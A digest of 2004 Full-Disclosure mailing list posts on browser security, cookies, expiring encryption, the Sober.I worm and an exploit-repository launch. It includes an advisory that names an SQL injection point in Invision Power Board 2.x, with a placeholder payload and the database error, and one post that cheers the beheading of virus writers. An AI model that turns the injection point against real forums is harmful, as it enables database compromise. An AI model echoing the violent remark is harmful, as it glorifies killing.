[Full-Disclosure] Time Expiry Algorithm??

2004-11-19 Thread Gautam R. Singh
Hi List,

I was just wondering, is there any encryption algorithm which expires with time? 
For example, an email message may be decrypted within 48 hours of its
delivery; otherwise it becomes useless or can't be decrypted with the
original key.

Gautam

-- 
Gautam R. Singh
http://gautam.techwhack.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Gmail anomaly

2004-11-19 Thread Steve R
 --- Micheal Espinola Jr [EMAIL PROTECTED]
wrote: 
 Yep, something is awry with Firefox's cookie
 management.  It pisses me
 off.  I disconnect from a site (close the browser),
 but the next time
 I open FF,  all my cookies are acting as if they are
 still live.
 
 The Maxthon add-on for IE does the same thing
 
 It's annoying as hell when you are testing web apps.

Firefox's cookie manager that comes with a default
installation isn't the best (I'm only talking about
the GUI.) Use the CookieCuller enhanced cookie manager
extension instead

http://mozdev.sweetooth.org/cookieculler/

It allows you to protect/unprotect individual cookies
so that when you hit Remove All Cookies only the ones
you want (autologins etc) are kept, the rest are
deleted. It also has the exceptions list. If you have
any Firefox cookie problems after this... wait a
minute... you *won't* have any problems with Firefox's
cookie management after this. It's not awry as you say
as I've *never* had any problems with cookies in
Firefox.

Regards
Steve







Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread Raoul Nakhmanson-Kulish
Hello, Danny!
This makes sense now, thanks Raoul!
One more question: to make things more secure, do you have any tips on
what settings to change in the firefox.js file? It's contains a lot of
info. :)
Very usable references here:
http://thegoldenear.org/toolbox/windows/docs/mozilla-pre-config.html
http://flii.us/myworks/phoenix/pages/user.html
http://www.guether.de/links/moz-mods.html (in German)
We use the settings listed below. They are not for FF but for Mozilla SeaMonkey, 
because we have been using the scheme described above for about a year in our company :)

But FF generally has the same settings; if not, anybody may correct me.
- default\prefs\browser-prefs.js -
pref("wallet.crypto", true);
// Encrypt saved passwords by default
pref("wallet.crypto.autocompleteoverride", true);
// Ignore 'autocomplete=off' on web pages
pref("update_notifications.enabled", false);
// Turn off autoupdate: this is unusable for an R/O share
pref("privacy.popups.first_popup", false);
// Turn off popup blocker welcome message
- greprefs\all.js -
pref("dom.disable_window_open_feature.status", true);
pref("dom.disable_window_status_change", true);
// Make status bar always visible and disable status spoofing
pref("dom.disable_window_open_feature.titlebar", true);
pref("dom.disable_window_open_feature.close", true);
pref("dom.disable_window_open_feature.minimizable", true);
// Prevent JavaScript from disabling the titlebar, close and minimize buttons
pref("dom.disable_open_during_load", true);
// Turn popup blocker on
pref("network.image.imageBehavior", 1);
// Load images from originating server only,
// reduces net traffic and privacy leaks
pref("network.proxy.autoconfig_url", "http://myproxy/autocfg.script");
// Enter URL of your proxy autoconfig here (if present)
// (only takes effect together with pref("network.proxy.type", 2);)
// OR
// If you want to set up the proxy manually, enter the values below
// (network.proxy.type 1 = manual configuration):
pref("network.proxy.type", 1);
pref("network.proxy.ftp", "myproxy_dns_or_ip");
pref("network.proxy.ftp_port", myproxy_port);
pref("network.proxy.gopher", "myproxy_dns_or_ip");
pref("network.proxy.gopher_port", myproxy_port);
pref("network.proxy.http", "myproxy_dns_or_ip");
pref("network.proxy.http_port", myproxy_port);
pref("network.proxy.ssl", "myproxy_dns_or_ip");
pref("network.proxy.ssl_port", myproxy_port);
// myproxy_port is a plain number, e.g. 3128; hostnames are quoted strings
pref("network.proxy.no_proxies_on", "your intranet servers list here");
// comma-separated, e.g. "localhost, 127.0.0.1, intranet.example.corp"
pref("network.cookie.cookieBehavior", 1);
// Accept cookies from originating server only, reduces privacy leaks
--
Best regards,
Raoul Nakhmanson-Kulish
Elfor Soft Ltd.,
ERP Department
http://www.elforsoft.ru/


[Full-Disclosure] Re: [Full-Dev-Server] Time Expiry Algorithm??

2004-11-19 Thread Michael Simpson
Interesting question.
Presumably there would have to be a time stamp as part of the sig which, if 
it was too old, would cause the message to get discarded.
You would have to hash the time as otherwise it would be open to spoofing.
I think Kerberos has this facility but it tends to be **MUCH** tighter 
(a matter of minutes by default, to allow for slew) and is used to stop replay 
attacks.

[EMAIL PROTECTED] wrote on 19/11/2004 07:39:19:

 Hi List,
 
 I was just wondering, is there any encryption algorithm which expires 
with time? 
 For example, an email message may be decrypted within 48 hours of its
 delivery; otherwise it becomes useless or can't be decrypted with the
 original key.
 
 Gautam
 
 -- 
 Gautam R. Singh
 http://gautam.techwhack.com
 



[Full-Disclosure] Sober.I worm is here

2004-11-19 Thread etomcat
Hello,

Looks like the new Sober.I worm is set to cause a medium-sized
epidemic; AV firms are starting to send out warnings to
their public mailing lists now.

It would be way cool if Mr. Zarkawi has beheaded all the
VXers for breaking the muslim holy day of Friday. I would be
dancing in the streets.

Regards, Tamas Feher.



Re: [Full-Disclosure] Time Expiry Algorithm??

2004-11-19 Thread Michael Simpson
not that kerberos is of use for your application

however i did find this

http://www.theregister.co.uk/2003/10/22/microsoft_launches_selfdestructing_email_false/

slightly heavy-handedly, there is this 

http://www.mailexpire.com/

there's this which claims to use openpgp but which is online

http://www.selfdestructing.com/selfdestructing/notary.asp

and this

http://www.smarterweb.co.uk/solutions/mailcertify/Self.cfm

and there is further discussion here 

http://lists.virus.org/cryptography-0409/msg00129.html

i've no doubt that searching www.counterpane.com will also shed more light 
on this


[EMAIL PROTECTED] wrote on 19/11/2004 07:39:19:

 Hi List,
 
 I was just wondering, is there any encryption algorithm which expires 
with time? 
 For example, an email message may be decrypted within 48 hours of its
 delivery; otherwise it becomes useless or can't be decrypted with the
 original key.
 
 Gautam
 
 -- 
 Gautam R. Singh
 http://gautam.techwhack.com
 



Re: [Full-Disclosure] Gmail anomaly

2004-11-19 Thread GuidoZ
I agree - the default cookie manager leaves much to be desired. I've
found a very useful extension called CookieCuller that handles them
much better, allowing you to save or clear cookies with a single
click. Plus, you can view the information contained in the cookie
without having to do anything special. It's so simple, yet so powerful
when used properly. I haven't had any more problems with FireFox and
cookies after I started using it (back with FireFox 0.9.x)

Check it out here:
 - http://mozdev.sweetooth.org/cookieculler/

HTH. It certainly did the trick for me.

--
Peace. ~G


On Fri, 19 Nov 2004 00:10:33 -0500, Micheal Espinola Jr
[EMAIL PROTECTED] wrote:
 Yep, something is awry with Firefox's cookie management.  It pisses me
 off.  I disconnect from a site (close the browser), but the next time
 I open FF,  all my cookies are acting as if they are still live.
 
 The Maxthon add-on for IE does the same thing
 
 It's annoying as hell when you are testing web apps.
 
 On Thu, 18 Nov 2004 16:33:07 -0800, ifconfig_xl0 [EMAIL PROTECTED] wrote:
  This is not a security risk but a weirdness worth noting. I reported
  it as a bug to gmail but im not sure if its a bug on their part it may
  be firefox not doing something right.
 
  If you open  two gmail accounts in two different firebird/fox browsers
  the first account logged into after a refresh becomes the second
  account. Or if you send an e-mail with the second account, it may
  send as the first and refresh back as account1.
 
  So if you login with GmailAccount1 and then open another browser and
  log into GA2, go back to GA1 browser and hit refresh, GA1 will be in
  the mailbox of GA2.
 
  This obviously is not a security risk because the mailbox was already
  logged into, but I still thought it was a weird thing to do. It doesnt
  act that way with internet exploder though so it must be something
  with Firefox ...
 
 
 
 --
 ME2
 




Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread Raoul Nakhmanson-Kulish
Hello, Esmond!
Offline folders work as well as roaming profiles do : nice fast networks
and low overhead/beefy servers work well, odd things happen if you have
impatient users with laptops, wireless etc. Sometimes its simply easier
to have a scheduled task sync files to a local folder. This will also
address the central-server-share-Firefox I/O bottleneck you will see
with medium size offices.
Agreed, in large or slow networks this would be a better solution.
You will lose the turnkey application security
the original poster sought. 
I don't think this is a problem. If the user doesn't have administrative 
rights, he/she can't edit the FF files copied from the server. Anyway, we 
are solving the problem of a fool-tolerant network in this topic, not of 
internal wrongdoers, aren't we? ;)

In IE, you can combat this using a configuration script in place of the
proxy server (and preferably in a public location) and outside of GP.
Mozilla/Firefox understands autoconfig scripts too.
The script hardcodes the proxy based on certain criteria (e.g. if local
ip is your corporate addressing - use internal proxy otherwise use
none).
An autoconfig script may enumerate the hosts which don't require a proxy. 
Usually there are very few intranet servers in a corporate network.

Moreover, I consider the IE feature of ignoring the proxy for LAN hosts 
potentially dangerous. Imagine a worm which spreads by this algorithm: it 
launches an HTTP service on the victim host, lures a user at another PC into 
opening a URL pointing to the victim, then launches on the target PC. The 
fact that the previously affected host is situated in the Local intranet zone 
significantly facilitates the worm's spreading.

Proxy servers are increasingly used to clean/protect IE users.
This is independent of the browser's vendor. A good proxy is always the best 
addition to a good browser :)

--
Best regards,
Raoul Nakhmanson-Kulish
Elfor Soft Ltd.,
ERP Department
http://www.elforsoft.ru/


Re: [Full-Disclosure] Gmail anomaly

2004-11-19 Thread Paulo Pereira
Micheal,

you can use the Web Developer Extension to delete domain cookies
whenever you want.

Paulo Pereira


quote who=Micheal Espinola Jr
 Yep, something is awry with Firefox's cookie management.  it pisses me
 off.  I disconnect from a site (close the browser), but the next time
 I open FF,  all my cookies are acting as if they are still live.

 The Maxthon add-on for IE does the same thing

 It's annoying as hell when you are testing web apps.


 On Thu, 18 Nov 2004 16:33:07 -0800, ifconfig_xl0 [EMAIL PROTECTED] wrote:
 This is not a security risk but a weirdness worth noting. I reported
 it as a bug to gmail but im not sure if its a bug on their part it may
 be firefox not doing something right.

 If you open  two gmail accounts in two different firebird/fox browsers
 the first account logged into after a refresh becomes the second
 account. Or if you send an e-mail with the second account, it may
 send as the first and refresh back as account1.

 So if you login with GmailAccount1 and then open another browser and
 log into GA2, go back to GA1 browser and hit refresh, GA1 will be in
 the mailbox of GA2.

 This obviously is not a security risk because the mailbox was already
 logged into, but I still thought it was a weird thing to do. It doesnt
 act that way with internet exploder though so it must be something
 with Firefox ...




 --
 ME2




-- 
Paulo Jorge Pereira
IP Network Engineering, CCIE 6372




Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread Borja Marcos
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Could you please define integrated? English isn't my primary 
language...
Integrated is similar to saying is part of or united. For future
reference (and more info), Google can also be extremely handy in such
a case. Doing a Google search for:
:-D
Thanks. I thought that it had more meanings :-D
	Given that Firefox is integrated in Linux... ¿Will I be able to use 
Linux without Firefox? Or, ¿is Firefox an operating system module? Being 
Linux a kernel... Is Firefox a kernel module? :-D (That was the whole 
point, I didn't mark the sarcasm correctly, though).


Borja.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)
iD8DBQFBne29ULpVo4XWgJ8RAk6RAKC3Hz6S+UgXwYFStdQ+vx+UdmSrIQCgygLV
g5eqzYciEFUG8h+/MtLm9Go=
=ZaI2
-----END PGP SIGNATURE-----


Re: [Full-Disclosure] Gmail anomaly

2004-11-19 Thread evilninja
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

GuidoZ schrieb:
 I agree - the default cookie manager leaves much to be desired. I've
 found a very useful extension called CookieCuller that handles them
[...]
 
 On Fri, 19 Nov 2004 00:10:33 -0500, Micheal Espinola Jr
 [EMAIL PROTECTED] wrote:
 
Yep, something is awry with Firefox's cookie management.  it pisses me
off.  I disconnect from a site (close the browser), but the next time
I open FF,  all my cookies are acting as if they are still live.

the "Remember Cookies: Until FF is closed" (or whatever it's called) does
not work? Then file a bug, please. FF >= 1.0pre is/was working here...


- --
BOFH excuse #61:

not approved by the FCC
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFBnf6fC/PVm5+NVoYRAvRWAJ4sR5svtUdWtE8YzFFKQx85qG81mwCg2qox
Dt+Ss0rcYBNLu0je9W7FVac=
=vaD5
-----END PGP SIGNATURE-----



[Full-Disclosure] SecurityForest - Public Release #1

2004-11-19 Thread loni



Community Website: http://www.securityforest.com
Community IRC channel: irc://irc.unixgods.net:/securityforest

Table of contents
=================
Summary
The Open Source Idea
Trees in the Forest
  ExploitTree
  ToolTree
  TutorialTree
  LinkTree
GreenHouse
Thanks

Summary
=======
SecurityForest.com is a collaboratively edited Forest consisting of Trees which 
anyone can contribute to. SecurityForest's trees are specific security 
repositories that are categorized for practical reasons. The technologies 
currently in use in these repositories are based on Wiki technology and CVS 
(Concurrent Versioning System) technology. Depending on the species of the 
tree, the suitable technology will be used. SecurityForest.com is a collection 
of repositories (trees) for the community, by the community. In other words, 
the updating, modifying and improving can be done by anyone in the community.

This public release is posted at 
http://www.securityforest.com/wiki/index.php?title=SecurityForest_-_Public_Release_no.1

The Open Source Idea
====================
The basic idea behind Open Source is very simple: when people can read, modify 
and improve a piece of software, the software evolves. People improve it, 
people adapt it, people fix bugs. And this can happen at a speed that, if one 
is used to the slow pace of conventional development, seems astonishing. We at 
SecurityForest have learned that this rapid evolutionary process produces 
better results than the traditional closed model, in which only very few 
people improve the Security Repositories and everybody else must use what 
these individuals have come across and added. SecurityForest is not only based 
on Open Source software, but is itself open source, meaning the updating, 
modifying and improving can be done by anyone in the community.

Trees in the Forest
===================

ExploitTree
-----------
ExploitTree's ambition is to obtain a categorized collection of ALL available 
exploit code and therefore to become the most organized, rich and up-to-date 
exploit repository on the internet. The ExploitTree is based on CVS 
(Concurrent Versioning System) and therefore allows the user to keep an 
up-to-date offline mirror of the repository on their hard drive. When a user 
updates their local copy with a new/updated exploit, it is requested that they 
update the repository and give back to the community. Furthermore, a web 
interface for web browsing is available.

ToolTree
--------
The ToolTree is made up of various Penetration and Security Tools. The 
branches are categorized according to the Hacking Defined Methodology and each 
tool in the Tree has a description, homepage link, download link and OS 
support. Tools are easy to find for a specific situation, and so the massive 
amount of tools available on the internet can be used to their full potential.

TutorialTree
------------
The TutorialTree (soon to be EducationTree) is a collection of articles and 
tutorials to educate in the different fields of security. Currently in Beta 
stage.

LinkTree
--------
The LinkTree is a repository of hyperlinks to useful websites which are 
currently categorized into the following:
* Security Sites
* Consulting Companies
* Education Companies
* Miscellaneous

GreenHouse
==========
The greenhouse is an idea that evolved to allow anyone who has an idea to use 
the GreenHouse as a framework for it to grow, with the help of the community, 
into one of SecurityForest's trees. The life cycle of a Tree in the 
SecurityForest is as follows:

Seed -> GreenHouse -> Forest

Anyone who has an idea for a tree is welcome to propose it by "Planting a 
Seed". Anyone who can back up a Seed with content and maintain it can plant it 
in the GreenHouse. Once a GreenHouse Tree is mature enough it will be made an 
official tree and be planted in the forest. Currently, the GreenHouse is home 
to PasswordTree, which consists of Default Passwords but is soon to grow other 
password branches.

Thanks
======
Many thanks goes out to ports, Physaro, Tal.z, Devicez, Anthrax and all the 
other members for their ongoing support in the forest. 


EOF

Best Regards,
Loni
[EMAIL PROTECTED] 



[Full-Disclosure] [MaxPatrol] SQL-injection in Invision Power Board 2.x

2004-11-19 Thread aanisimov
   [ SQL-injection in Invision Power Board 2.x ]

   MaxPatrol Security Advisory 11.18.04
   November 18, 2004


   Release Date:      November 18, 2004
   Date Reported:     November 12, 2004
   Severity:          High
   Application:       Invision Power Board v2.x
   Affected versions: IPB 2.0.0, IPB 2.0.1 and IPB 2.0.2
   Platform:          PHP


I. DESCRIPTION

   An input validation vulnerability was reported in Invision Power Board v2.x. 
A remote user can conduct a SQL injection attack.


   Example:

   http://site/forum/index.php?act=Post&CODE=02&f=2&t=1&qpid=1[sql_injection]


   Result:

 --
   mySQL query error: select p.*,t.forum_id FROM ibf_posts p LEFT JOIN 
ibf_topics t ON (t.tid=p.topic_id)
   WHERE pid IN (1[sql_injection])
   
   mySQL error: You have an error in your SQL syntax near '[sql_injection])' at 
line 2
   mySQL error code: 
   Date: Friday 12th of November 2004 06:53:25 PM
 --


   This vulnerability was found automatically by the full-featured commercial 
version of MaxPatrol.


II. IMPACT

   A remote user may be able to execute arbitrary SQL commands on the 
underlying database.


III. SOLUTION

   To update your IPB 2.x board, simply download the security update file, expand 
it and upload sources/post.php over the one in your installation.


IV. VENDOR FIX/RESPONSE

   Vulnerability is fixed.

   Security update:

   http://forums.invisionpower.com/index.php?showtopic=154916
   http://forums.invisionpower.com/index.php?act=Attach&type=post&id=4992


V. CREDIT

   This vulnerability was discovered by Positive Technologies using MaxPatrol 
   (www.maxpatrol.com), an intelligent professional security scanner. It is able 
   to detect a substantial number of vulnerabilities not yet published. 
   MaxPatrol's intelligent algorithms are also capable of detecting many 
   vulnerabilities in custom web scripts (XSS, SQL and code injection, HTTP 
   Response Splitting).




Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread Kenneth Ng
In my opinion, there are two defintions for integrated.  For most
people, it means a works with b.  For Microsoft, it means a can
not work without b.  Firefox is definitely the former because I use
it both under Linux and under Windows, and I'm trying to get it to
work on my Zaurus.


On Fri, 19 Nov 2004 13:57:31 +0100, Borja Marcos [EMAIL PROTECTED] wrote:
 -----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 
  Could you please define integrated? English isn't my primary
  language...
 
  Integrated is similar to saying is part of or united. For future
  reference (and more info), Google can also be extremely handy in such
  a case. Doing a Google search for:
 
 :-D
 
 Thanks. I thought that it had more meanings :-D
 
 Given that Firefox is integrated in Linux... ¿Will I be able to use
 Linux without Firefox? Or, ¿is Firefox an operating system module? Being
 Linux a kernel... Is Firefox a kernel module? :-D (That was the whole
 point, I didn't mark the sarcasm correctly, though).
 
 Borja.
 
 
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.2.4 (Darwin)
 
 iD8DBQFBne29ULpVo4XWgJ8RAk6RAKC3Hz6S+UgXwYFStdQ+vx+UdmSrIQCgygLV
 g5eqzYciEFUG8h+/MtLm9Go=
 =ZaI2
 
 
 -----END PGP SIGNATURE-----
 




Re: [Full-Disclosure] Gmail anomaly

2004-11-19 Thread Micheal Espinola Jr
Thanks, will do!


On Fri, 19 Nov 2004 10:43:06 +, GuidoZ [EMAIL PROTECTED] wrote:
 I agree - the default cookie manager leaves much to be desired. I've
 found a very useful extension called CookieCuller that handles them
 much better, allowing you to save or clear cookies with a single
 click. Plus, you can view the information contained in the cookie
 without having to do anything special. It's so simple, yet so powerful
 when used properly. I haven't had any more problems with FireFox and
 cookies after I started using it (back with FireFox 0.9.x)
 
 Check it out here:
 - http://mozdev.sweetooth.org/cookieculler/
 
 HTH. It certainly did the trick for me.
 
 --
 Peace. ~G
 
 On Fri, 19 Nov 2004 00:10:33 -0500, Micheal Espinola Jr
 
 
 [EMAIL PROTECTED] wrote:
  Yep, something is awry with Firefox's cookie management.  it pisses me
  off.  I disconnect from a site (close the browser), but the next time
  I open FF,  all my cookies are acting as if they are still live.
 
  The Maxthon add-on for IE does the same thing
 
   It's annoying as hell when you are testing web apps.
 
  On Thu, 18 Nov 2004 16:33:07 -0800, ifconfig_xl0 [EMAIL PROTECTED] wrote:
   This is not a security risk but a weirdness worth noting. I reported
   it as a bug to gmail but im not sure if its a bug on their part it may
   be firefox not doing something right.
  
   If you open  two gmail accounts in two different firebird/fox browsers
   the first account logged into after a refresh becomes the second
    account. Or if you send an e-mail with the second account, it may
   send as the first and refresh back as account1.
  
   So if you login with GmailAccount1 and then open another browser and
   log into GA2, go back to GA1 browser and hit refresh, GA1 will be in
   the mailbox of GA2.
  
   This obviously is not a security risk because the mailbox was already
   logged into, but I still thought it was a weird thing to do. It doesnt
   act that way with internet exploder though so it must be something
   with Firefox ...
  
  
 
  --
  ME2
 
 
 


-- 
ME2
http://www.santeriasys.net/rss.php



Re: [Full-Disclosure] Sober.I worm is here

2004-11-19 Thread KF_lists
can you define medium sized epidemic?
Any new features / functionality?
-KF
[EMAIL PROTECTED] wrote:
Hello,
Looks like the new Sober.I worm is set to cause a medium-sized
epidemic; AV firms are starting to send out warnings to
their public mailing lists now.
It would be way cool if Mr. Zarkawi has beheaded all the
VXers for breaking the muslim holy day of Friday. I would be
dancing in the streets.
Regards, Tamas Feher.


RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread joe
 Autoconfig script may enumerate hosts which don't require a proxy. 
 Usually there are a very few intranet servers in corporate network.

You should have prefixed there are very few...  with one of two things 

1. Relative to the internet...

2. In my experience...


I have been on several large corporate networks where there are hundreds or
thousands of intranet web servers hosting tens of thousands of sites. Many
large enterprise class companies are moving whole hog to web based apps
internally (even email) and all available content is on the internal web. 

This is actually the area where IE is so strongly embedded due to its
application interfaces and what MS has been building towards for so long
with it. If you look at this space and compare how firefox renders/operates
next to IE you will see why many companies chose IE as their official
browser even in the face of having more exposure due to security. A lot of
that depends on how the web site is designed/built but there is a lot of
functionality there that can only be reached (and thereby exploited) on IE.
There are companies whose primary LOB applications internally are on IIS
servers and can only be accessed with IE. In those cases it isn't a simple
pick up and replace the browser scenario. 



 More, I consider IE feature to ignore proxy for LAN hosts may be 
 dangerous. Imagine a worm which spreads by this algorithm: it 
 launches HTTP service on victim host, lures user at another PC to 
 open URL pointing to victim, then launches on target PC. The fact 
 as previously affected host is situated in Local intranet zone, 
 significantly facilitates worm spreading.

I wouldn't really call that a worm. Worms work without interaction. They are
self-propagating/replicating. Malware that spreads that requires user
interaction would generally just be called a virus.


Overall trying to push intranet users accessing intranet content through a
proxy to sanitize web pages would be unsatisfactory because it couldn't
fully be enforced since the content is available right there on the
intranet. Someone could do some form of offline gather or use many different
tools to get the data so forcing firefox or IE to go to a specific proxy
does nothing for you. You would have to put the intranet servers behind some
sort of firewall that you would have to access them though. Plus you
obviously have to scale the proxy to a completely different level if
processing all intranet requests as well as internet requests. 


  joe

-- 
Pro-Choice
Let me choose if I even want a browser loaded thanks!




-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Raoul
Nakhmanson-Kulish
Sent: Friday, November 19, 2004 5:01 AM
To: Esmond; [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] IE is just as safe as FireFox

Hello, Esmond!




RE: [Full-Disclosure] WiFi question

2004-11-19 Thread Paul Schmehl
--On Thursday, November 18, 2004 09:32:27 AM -0600 Paul Schmehl 
[EMAIL PROTECTED] wrote:

--On Wednesday, November 17, 2004 12:41:44 PM -0500 Lachniet, Mark
[EMAIL PROTECTED] wrote:
Could also be RF interference.  One of my coworkers tracked down a
particularly interesting problem with motion sensor lights.  Turns out
the motion sensors worked at the 240mhz range, which has resonance at
2.4ghz, or something like that.  Hence every time the motion sensor
worked, it would spew what the wardriving (site survey) apps thought was
a zillion different access points with widely varying MAC addresses.  I
would have thought it was a FAKEAP program also.  I would assume the same
could happen with other interference.  Having a common SSID would seem
to indicate this is not the problem, but just thought I'd mention it.
Thanks for a particularly interesting and potentially useful bit of
information, Mark.
After forwarding this to our wireless expert, he responded with this (which 
he has authorized me to forward to the list.)

I find it hard to believe that this is possible.  2.4Ghz is the 9th 
harmonic.  By the time you get to the 4th harmonic of a signal, even in 
very very noisy radiators, the strength of the harmonic component of the 
signal is extremely minute.  And, given the fact that one of those sensors 
(which most likely does *not* truly operate in the 240MHz portion of the 
spectrum) will have a very low output (Part 15 device), the 10th harmonic 
of that signal will be undetectable as it will be at or below the level of 
background noise.

Finally, if a device managed to get past all of the improbabilities above, 
the chances of it *accidentally* creating a signal that looked like an 
802.11 beacon packet, complete with preamble, header, etc is so off the 
charts as to be laughable.

One other thing...  If that device truly was operating at 240MHz, then the 
first harmonic would be 480MHz.  I'm pretty sure that frequency lies in the 
public service bands (ie fire/police).  If not, its very close.  Given that 
and the fact that the first harmonic would be much stronger than the 9th 
harmonic, I'm pretty sure someone in those bands would have complained 
loudly to the FCC as they don't take interference issues in those bands 
lightly.

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu


Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread Valdis . Kletnieks
On Fri, 19 Nov 2004 13:57:31 +0100, Borja Marcos said:

   Given that Firefox is integrated in Linux... ¿Will I be able to use 
 Linux wthout Firefox? Or, ¿is Firefox an operating system module? Being 

Hint:  Linux is over 10 years old, and FireFox just came out.  What did Linux
do before FF 1.0 shipped? ;)

Linux integration:  Tools register themselves as optional add-ons to add new
or extended functionality.  If the tool isn't there, all that happens is the
menu items *for that added function* end up greyed out or don't show up,
or simply Nothing Interesting Happens when you click on the object.

Microsoft integration: You remove the application that plays MPEG movies
from a system that has never needed to play MPEG movies, and never will need
to - and your system won't boot anymore.




RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread joe
Georgi, you obviously aren't in touch with the real world if you don't
realize which OS and browser comprise a vast majority of the market. That
penetration often dictates for many IT professionals which OS they will be
working on if they actually choose to work in the field. When you specify
our in this way, you are specifying a very small minority. 

As someone else mentioned, I believe on this list, they had the option of
working on MS products and making money (that is what companies are in
business for BTW) or working on non-MS products and fighting with other
suppliers over a small market and probably not making any money. 

As much as I hate car analogies: instead of jumping to a car that runs on
hydrogen because it is safer and better for the environment and bitching at
all of the gas stations that don't sell hydrogen, I would rather just stick
with a gasoline vehicle until the hydrogen infrastructure is able to support
a large number of hydrogen vehicles. If I need to drive from Tennessee to
Florida I need to drive, I don't need to spend the time whining and
complaining and trying to find places that can make it so I can actually do
what I need to do. If I have a hydrogen tank by home though, that is perfect
for driving around there as long as it handles everything else I need in
that space. 


  joe

--
Pro-Choice
Let me choose if I even want a browser loaded thanks!



-Original Message-
From: Georgi Guninski [mailto:[EMAIL PROTECTED] 
Sent: Thursday, November 18, 2004 3:55 AM
To: joe
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] IE is just as safe as FireFox

On Wed, Nov 17, 2004 at 09:22:33PM -0500, joe wrote:
 Pro-Choice
 Let me choose if I even want a browser loaded thanks!


what the fuck is this?
we can choose such things on our os, who must let you choose?

--
where do you want bill gates to go today?



Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread devis
This message is primarily destined to all MS trolls, no matter their 
levels, and i can see so many in this list that i am happy to target a 
large audience.

Please run some unix or at least read about the unix permission system, 
and let's pray God this sheds some light into your mono-cultured brains. 
Here are the relevant points:

1) Despite recent ameliorations of MS ( multi user finally, permissions 
... ) and some effort at making the system more secure, something very 
important is still left out: The first default user of the MS computer 
is made an administrator. This comes down to giving uid 0 to your first 
unix user. Unix does NOT do that. It requires you to use su and become 
root ( administrator ) after proper credentials submission ( password ). 
The first user is NOT an administrator, and any recent Unix 
documentation will insist on the danger of running as root (admin). Unix 
keeps the admin account well separated from the user account, which MS 
DOESN'T, despite all the wrong arguments I read on this list. VERY BAD 
practice generally. So it's user friendly, as the user has admin rights 
and can therefore install and remove software and change major 
configuration. The majority of users don't and will never know there is an 
'administrator' user that hides from their eyes.
This little detail that apparently MS people can't 'understand' is a 
huge step. Please install a proper unix, create 2 accounts and try to 
read the home directory of the second user from the first.

2) After all, they don't need to know. You're on a need-to-know 
basis job.
Do MS really think the users are stupid? Is understanding different 
IDs / roles / accounts on a computer that much of a tough message to pass 
to the end user? Isn't security important and supposedly the goal of 
recent MS developments? If they really did target security, their 
efforts would have gone into making the user understand that he should be 
admin to install programs, and a non-privileged user to surf the web. 
Is that that hard to understand? And that much hidden in high IT 
security professional unreachable knowledge? I don't think so. Doesn't 
a company such as MS have enough resources to make that a priority and 
educate the users? Of course it has. Just not very 'commercially' 
friendly, as if users then understand roles, it might require less anti 
virus, personal firewall and other bullshit FUD scareware ( Yes it's 
scareware, and it is the best selling software category OF ALL time in 
software history ).

This is why Firefox, being independent from this OS that carries 60 of 
its code base as legacy code for older system hardware and 
backward compatibility, is likely more secure than the in-house 
integrated application. Now if you are running Firefox as an administrator 
...don't be surprised if something happens. Don't blame the software, 
but your poor security practices.

Let's not hide from ourselves what's needed from MS to reach modern world 
security:
a complete rewrite, and a ditch of the old DOS base and the 20 years old 
legacy code.

Hope that clears things.

Rafel Ivgi, The-Insider wrote:
Firefox is not integrated into the OS, because it doesn't have an OS.
It's just a trimmed Mozilla for windows..
However Mozilla in Linux is integrated at some level...so they are just the
same as I.E.
Rafel Ivgi, The-Insider
Security Consultant
Malicious Code Research Center (MCRC)
Finjan Software LTD
E-mail: [EMAIL PROTECTED]
-
Prevention is the best cure!
- Original Message - 
From: john morris [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Sunday, November 14, 2004 3:34 PM
Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox


Firefox avoids several fundamental design flaws of IE, in that:
-Firefox is not integrated into Windows, and thus closes holes
allowing access to the OS.
-Firefox does not support ActiveX, JavaVM or VBScript, three Microsoft
proprietary technologies that are responsible for many security holes.
-Firefox does not allow for the invasion of your system by adware and
spyware just by visiting a website.
(FROM LINKS TO LINKS WE ARE ALL LINKED)
cheers.
morris


Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread Vincent Archer
On Fri, Nov 19, 2004 at 10:51:43AM -0500, joe wrote:
  Autoconfig script may enumerate hosts which don't require a proxy. 
  Usually there are a very few intranet servers in corporate network.
 
 You should have prefixed there are very few...  with one of two things 
 
 1. Relative to the internet...
 
 2. In my experience...

Well, he did say usually :)

 This is actually the area where IE is so strongly embedded due to its
 application interfaces and what MS has been building towards for so long
 with it. If you look at this space and compare how firefox renders/operates
 next to IE you will see why many companies chose IE as their official
 browser even in the face of having more exposure due to security. A lot of
 that depends on how the web site is designed/built but there is a lot of
 functionality there that can only be reached (and thereby exploited) on IE.
 There are companies whose primary LOB applications internally are on IIS
 servers and can only be accessed with IE. In those cases it isn't a simple
 pick up and replace the browser scenario. 

Even something as simple as OWA (Outlook Web Access), which is often used
as the main component of the corporate Extranet is strikingly different.
OWA looks like an average web app when viewed on a Mozilla or similar
browser. OWA looks almost exactly like Outlook when viewed by IE.

Other apps flatly refuse to work with anything but IE. None of these
are strictly web applications anymore - they are applications that use
a UI processor, which happens to be the HTML processor as well.

-- 
